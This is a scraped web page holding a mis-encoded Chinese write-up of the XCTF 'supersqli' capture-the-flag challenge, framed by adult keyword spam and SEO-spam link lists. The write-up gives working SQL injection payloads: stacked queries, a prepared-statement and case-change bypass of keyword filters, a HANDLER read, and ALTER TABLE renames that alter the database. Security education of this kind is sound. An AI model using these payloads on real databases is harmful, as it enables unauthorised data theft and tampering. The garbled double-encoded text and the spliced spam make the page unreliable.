国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁 > news >正文

網(wǎng)站維護(hù)需要多少錢全網(wǎng)引流推廣

網(wǎng)站維護(hù)需要多少錢,全網(wǎng)引流推廣,seo點(diǎn)石論壇,明星做代言的購物網(wǎng)站0XCTF_Web_高手進(jìn)階區(qū) supersqli supersqli 這里使用谷歌瀏覽器 拿到題目后,發(fā)現(xiàn)是單引號報錯字符型注入 用order by語句判斷出兩個字段:order by 2的時候頁面正?;仫@,order by 3的時候頁面出錯。 使用union select聯(lián)合查詢,發(fā)現(xiàn)…

XCTF_Web_高手進(jìn)階區(qū)

  • supersqli

supersqli

這里使用谷歌瀏覽器
拿到題目后,發(fā)現(xiàn)是單引號報錯字符型注入
在這里插入圖片描述
用order by語句判斷出兩個字段:order by 2的時候頁面正?;仫@,order by 3的時候頁面出錯。
使用union select聯(lián)合查詢,發(fā)現(xiàn)關(guān)鍵字select被正則過濾了
在這里插入圖片描述
因此,需要繞過select的過濾
解法一:
(1)堆疊注入/?inject=-1’;show tables --+
在這里插入圖片描述
(2)發(fā)現(xiàn)了兩張表,分別查詢兩張表中的字段,
/?inject=-1’;show columns from 1919810931114514 --+
在這里插入圖片描述
/?inject=-1’;show columns from words --+
在這里插入圖片描述
(3)發(fā)現(xiàn)了flag在第一個表中,接下來就是要查看flag的內(nèi)容了。但是select被過濾了,這里可以采用預(yù)編譯的方式繞過。

?inject=-1';set @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepare aaa from @sql;EXECUTE aaa;#

在這里插入圖片描述
(4)這里用strstr函數(shù)過濾了’set’和’prepare’關(guān)鍵詞,利用strstr不能區(qū)分大小寫,將其改為大寫即可

/?inject=-1';sEt @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepArE aaa from @sql;EXECUTE aaa;#

或者

/?inject=-1';sEt @sql = CONCAT('se','lect * from \`1919810931114514\`;');prEpare stmt from @sql;EXECUTE stmt;#

或者

/?inject=-1';use supersqli;set @sql=concat('s','elect * from \`1919810931114514\`');PREPARE pre FROM @sql;EXECUTE pre;--+

在這里插入圖片描述
解法二:
handler查詢
在查找到有兩張表的前提下進(jìn)行
(1)使用方法:
handler table_name open打開一張表
handel table_name read first讀取第一行內(nèi)容,
handel table_name read next依次獲取其它行

/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在這里插入圖片描述
解法三:
(1)修改表名和列名,在查找到兩個表后,看一下第二個表
在這里插入圖片描述
(2)其中有一個列就是data列,是可以進(jìn)行查詢的。所以這里將表1919810931114514名字改為words,flag列名字改為id,就可以查詢flag的內(nèi)容了。

1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

其中:
alter table words rename to aaaa;先把原來的words表名字改成別的,這個隨便
alter table`1919810931114514` rename to words;將表1919810931114514的名字改為words
alter table words change flag id varchar(100);將改完名字后的表中的flag改為id,字符串盡量長點(diǎn)
(3)然后用1’ or 1=1 --+直接就能得到正確結(jié)果
在這里插入圖片描述

http://m.aloenet.com.cn/news/44208.html

相關(guān)文章:

  • 中國電商建站程序seo運(yùn)營是做什么的
  • 個人做網(wǎng)站需要備案嗎bt兔子磁力天堂
  • 用什么軟件做網(wǎng)站最快搜索量排行
  • 桂林做網(wǎng)站公司seo網(wǎng)絡(luò)優(yōu)化
  • 日照網(wǎng)站制作seo診斷站長
  • 博客網(wǎng)站如何建設(shè)互聯(lián)網(wǎng)推廣渠道
  • 做飛機(jī)票預(yù)訂網(wǎng)站如何做網(wǎng)站推廣的策略
  • 做彩票生意要登陸哪個網(wǎng)站百度最怕哪個投訴電話
  • 上海 網(wǎng)站制作公司網(wǎng)絡(luò)建站工作室
  • 有什么做服裝的網(wǎng)站蘭州seo網(wǎng)站建設(shè)
  • div css網(wǎng)站邊框模板疫情防控最新政策
  • 網(wǎng)站建設(shè)公司的公眾號百度官網(wǎng)平臺
  • 網(wǎng)站制作需要哪些軟件有哪些網(wǎng)站宣傳推廣策劃
  • 上海做網(wǎng)站 公司關(guān)鍵詞排名優(yōu)化怎么做
  • 舟山建設(shè)信息港門戶網(wǎng)站seo網(wǎng)絡(luò)推廣技術(shù)員招聘
  • 成都疫情實(shí)時狀況seo搜索優(yōu)化 指數(shù)
  • 外管局網(wǎng)站上做預(yù)收登記廊坊seo
  • 網(wǎng)站安全如何做百度 營銷推廣多少錢
  • tomcat做網(wǎng)站站長之家查詢的網(wǎng)址
  • 十堰微網(wǎng)站建設(shè)淘寶自動推廣軟件
  • 淘寶客做的比較好的網(wǎng)站友情鏈接有哪些作用
  • 網(wǎng)站中的圖片必須用 做嗎網(wǎng)站建設(shè)純免費(fèi)官網(wǎng)
  • 個人網(wǎng)站怎么建設(shè)關(guān)鍵詞分為哪幾類
  • 網(wǎng)站策劃怎么做內(nèi)容環(huán)球軍事網(wǎng)
  • 網(wǎng)站制作怎樣做背景常用的網(wǎng)絡(luò)推廣方法有
  • 旅游網(wǎng)站建設(shè)系統(tǒng)百度一下官網(wǎng)頁
  • 企業(yè)做網(wǎng)站設(shè)計(jì)百度seo營銷推廣
  • 如何自己做網(wǎng)站一年賺一億東莞推廣公司
  • cms 開源持續(xù)優(yōu)化疫情防控舉措
  • 買了兩臺服務(wù)器可以做網(wǎng)站嗎濟(jì)南優(yōu)化網(wǎng)頁